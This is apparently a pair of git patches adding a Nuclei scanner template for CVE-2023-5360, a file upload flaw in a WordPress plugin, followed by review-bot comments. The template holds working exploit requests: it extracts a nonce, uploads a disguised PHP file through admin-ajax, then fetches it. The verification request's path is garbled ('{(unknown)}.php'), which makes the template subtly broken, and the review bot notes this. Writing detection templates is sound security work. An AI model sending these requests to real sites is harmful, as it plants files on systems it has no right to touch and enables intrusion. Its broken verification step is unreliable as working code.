From e3cad34cd3a1aa46e9798caf9020c584bebf32cc Mon Sep 17 00:00:00 2001
From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com>
Date: Tue, 17 Oct 2023 14:30:45 +0530
Subject: [PATCH 1/2] Create CVE-2023-5360.yaml
---
 http/cves/2023/CVE-2023-5360.yaml | 83 +++++++++++++++++++++++++++++++
 1 file changed, 83 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-5360.yaml
diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml
new file mode 100644
index 0000000000..0699a2f207
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -0,0 +1,83 @@
+id: CVE-2023-5360
+
+info:
+ name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
+ author: theamanrawat
+ severity: critical
+ description: |
+ Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
+ reference:
+ - https://wordpress.org/plugins/royal-elementor-addons/
+ - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-5360
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauthenticated
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236
+
+ -----------------------------318949277012917151102295043236
+ Content-Disposition: form-data; name="uploaded_file"; filename="{{randstr}}.ph$p"
+ Content-Type: image/png
+
+
+ -----------------------------318949277012917151102295043236
+ Content-Disposition: form-data; name="allowed_file_types"
+
+ ph$p
+ -----------------------------318949277012917151102295043236
+ Content-Disposition: form-data; name="triggering_event"
+
+ click
+ -----------------------------318949277012917151102295043236
+ Content-Disposition: form-data; name="wpr_addons_nonce"
+
+ {{nonce}}
+ -----------------------------318949277012917151102295043236--
+
+ - |
+ GET /wp-content/uploads/wpr-addons/forms/{(unknown)}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_3
+ words:
+ - "86398d3a90432d24901a7bbdcf1ab2ba"
+ condition: and
+
+ - type: word
+ part: header_3
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: nonce
+ part: body_1
+ group: 1
+ regex:
+ - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
+ internal: true
+
+ - type: regex
+ name: filename
+ part: body_2
+ group: 1
+ regex:
+ - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
+ internal: true
From 22719a4c3ee574086cb32b495a296867dd5467ba Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 17 Oct 2023 17:28:54 +0530
Subject: [PATCH 2/2] minor update
---
 http/cves/2023/CVE-2023-5360.yaml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml
index 0699a2f207..c45535e856 100644
--- a/http/cves/2023/CVE-2023-5360.yaml
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -10,9 +10,15 @@ info:
 - https://wordpress.org/plugins/royal-elementor-addons/
 - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
 - https://nvd.nist.gov/vuln/detail/CVE-2023-5360
+ remediation: Fixed in 1.3.79
 metadata:
 verified: "true"
- tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauthenticated
+ max-request: 3
+ publicwww-query: "/plugins/royal-elementor-addons/"
+ tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
+
+variables:
+ file: "{{to_lower(rand_text_alpha(5))}}"
 
 http:
 - raw:
@@ -26,7 +32,7 @@ http:
 Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236
 
 -----------------------------318949277012917151102295043236
- Content-Disposition: form-data; name="uploaded_file"; filename="{{randstr}}.ph$p"
+ Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
+ Content-Type: image/png
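Review bot: The third raw request's path reads `/wp-content/uploads/wpr-addons/forms/{(unknown)}.php`, which is not a template-variable reference, so the `filename` extractor declared at the end of the file (`name: filename`, `internal: true`) is never consumed and the verification GET cannot reach the path the server reported in `body_2`; assuming the line really reads this way in the commit and is not a rendering artifact, it should be `GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1`. Separately, every host on which the second request succeeds is left with a file under `wp-content/uploads/wpr-addons/forms/` and the template has no cleanup step, yet the `description` does not say so; a sentence such as `A successful run stores a file under /wp-content/uploads/wpr-addons/forms/ on the target; remove it after scanning.` would tell operators and responders what to expect (the second patch adds the `intrusive` tag but likewise does not document the residual file). The `condition: and` on the single-entry `words` list of the `body_3` matcher is redundant and can be dropped.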
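Review bot: The new `remediation: Fixed in 1.3.79` line restates the closing sentence of the `description` above this hunk (`This vulnerability has been fixed in version 1.3.79`) without telling the reader what to do; make the new field the actionable statement, e.g. `remediation: Update the Royal Elementor Addons plugin to version 1.3.79 or later.`, and drop the duplicated sentence from the description. `max-request: 3` is consistent with the three raw requests in the `http` block, and the added `intrusive` tag is warranted because the second request writes a file to the target.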